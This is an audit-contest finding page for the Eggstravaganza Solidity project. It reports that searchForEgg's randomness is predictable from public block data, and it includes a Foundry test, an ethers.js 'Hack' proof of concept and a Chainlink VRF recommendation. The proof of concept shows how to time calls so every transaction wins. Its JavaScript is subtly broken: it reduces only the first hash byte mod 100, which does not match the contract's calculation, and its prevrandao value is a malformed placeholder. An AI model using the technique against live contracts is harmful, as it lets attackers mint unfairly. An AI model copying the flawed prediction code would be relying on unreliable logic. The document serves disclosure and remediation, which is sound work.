Eggstravaganza

First Flight #37
Beginner Friendly, Solidity
100 EXP
Submission Details
Severity: high
Valid

searchForEgg function can be exploited (the pseudo-random number is predictable, not random)

Summary

The searchForEgg function can be exploited because every input to the pseudo-random number is a publicly known value. Anyone can recompute the number off-chain before calling the function and only submit a transaction when the outcome is a win, so there is no real randomness.

Vulnerability Details

1. block.timestamp: a public block field, known to everyone.
2. block.prevrandao: also a public block field (it was block.difficulty before the Merge).
3. eggCounter: a public state variable.
4. msg.sender: the address of the function caller, chosen by the caller.

Since all of these values are known, an attacker can recompute the pseudo-random number every block, call searchForEgg only when the result is below the threshold, and mint an unlimited number of NFTs.
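The following Foundry test is an added illustration of the finding and is not code from the Eggstravaganza project. It assumes the contract derives its roll as keccak256(abi.encode(block.timestamp, block.prevrandao, msg.sender, eggCounter)) % 100 and compares it with eggFindThreshold (the four inputs and the modulus are taken from the finding above; the contract name EggHuntStandIn, the eggsFound mapping and the threshold value 20 are assumptions). The first test shows that a caller can know the result before sending the transaction; the second shows why the threshold stops meaning anything once the roll is predictable. Both tests pass against the predictable implementation and should fail once the randomness source is replaced.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

/// Stand-in for the game contract, written as an assumption about how
/// searchForEgg derives its roll (keccak256 over the four public inputs named
/// in the finding, reduced mod 100). It is not the project's code.
contract EggHuntStandIn {
    uint256 public eggCounter;
    uint256 public eggFindThreshold = 20; // assumed value
    mapping(address => uint256) public eggsFound;

    function searchForEgg() external {
        uint256 roll = uint256(
            keccak256(abi.encode(block.timestamp, block.prevrandao, msg.sender, eggCounter))
        ) % 100;
        if (roll < eggFindThreshold) {
            eggCounter++;
            eggsFound[msg.sender]++;
        }
    }
}

/// Regression test: if these pass, the roll is reproducible from public chain data.
contract PredictableEggTest is Test {
    EggHuntStandIn game;
    address player = makeAddr("player");

    function setUp() public {
        game = new EggHuntStandIn();
    }

    /// Recomputes the roll exactly as the contract does, using only values any
    /// node can see: the block timestamp and prevrandao, the caller and the counter.
    function _predictRoll(address who) internal view returns (uint256) {
        return uint256(
            keccak256(abi.encode(block.timestamp, block.prevrandao, who, game.eggCounter()))
        ) % 100;
    }

    function test_OutcomeIsKnownBeforeTheCall() public {
        // Fix the block fields so the run is deterministic; these are constructed values.
        vm.warp(1_712_222_222);
        vm.prevrandao(bytes32(uint256(0xabc123)));

        bool predictedWin = _predictRoll(player) < game.eggFindThreshold();
        uint256 before = game.eggsFound(player);

        vm.prank(player);
        game.searchForEgg();

        bool actualWin = game.eggsFound(player) == before + 1;
        assertEq(actualWin, predictedWin, "roll was not predictable from public inputs");
    }

    /// A caller that only transacts when the prediction is a win never loses:
    /// every block with a losing roll is simply skipped.
    function test_EveryTransactionSentIsAWin() public {
        vm.prevrandao(bytes32(uint256(0xabc123)));
        uint256 ts = 1_712_222_222;
        uint256 sent;
        for (uint256 i = 0; i < 200; i++) {
            vm.warp(ts + i * 12); // one simulated block per iteration
            if (_predictRoll(player) >= game.eggFindThreshold()) continue; // losing block, skip
            vm.prank(player);
            game.searchForEgg();
            sent++;
        }
        // The 20% threshold did not apply to any transaction that was actually sent.
        assertEq(game.eggsFound(player), sent);
        assertGt(sent, 0);
    }
}
```

Run with `forge test --match-contract PredictableEggTest`. The useful property of this test is that it is written against the public inputs only: it never reads private state or replays the contract's code, which is exactly the position of an outside caller.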

Hack

// Proof of concept using ethers v5 (the ethers.utils namespace is v5-only).
const ethers = require("ethers");

// Inputs to the pseudo-random number; every one of them is public chain data.
const blockTimestamp = 1712222222; // simulate current block.timestamp
const prevrandao = "0xabc123..."; // placeholder: fetch the real value from the previous block
const sender = "0xYourAddress"; // placeholder: the caller's checksummed address
const eggCounter = 42; // read from the contract's public eggCounter()

// Reproduce the contract's hash preimage: abi.encode(timestamp, prevrandao, sender, counter).
const data = ethers.utils.defaultAbiCoder.encode(
["uint256", "bytes32", "address", "uint256"],
[blockTimestamp, prevrandao, sender, eggCounter]
);
const hash = ethers.utils.keccak256(data);
// Reduce the hash to a roll in [0, 100) the same way the contract does.
const random = parseInt(hash.slice(2, 4), 16) % 100;

// The roll is known before the transaction is ever sent.
if (random < 20) {
console.log("Egg will be found!");
}

Impact

The eggFindThreshold variable is of no use: because the roll can be predicted, a caller only transacts when the roll is a win, so the actual chance of finding an egg is far higher than the threshold implies.

Tools Used

Foundry

Recommendations

Use Chainlink VRF to generate the random number, so the roll is produced off-chain by a verifiable source and delivered in a separate transaction that the caller cannot predict or front-run.

Updates

Lead Judging Commences

m3dython Lead Judge 3 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Insecure Randomness

Insecure methods to generate pseudo-random numbers
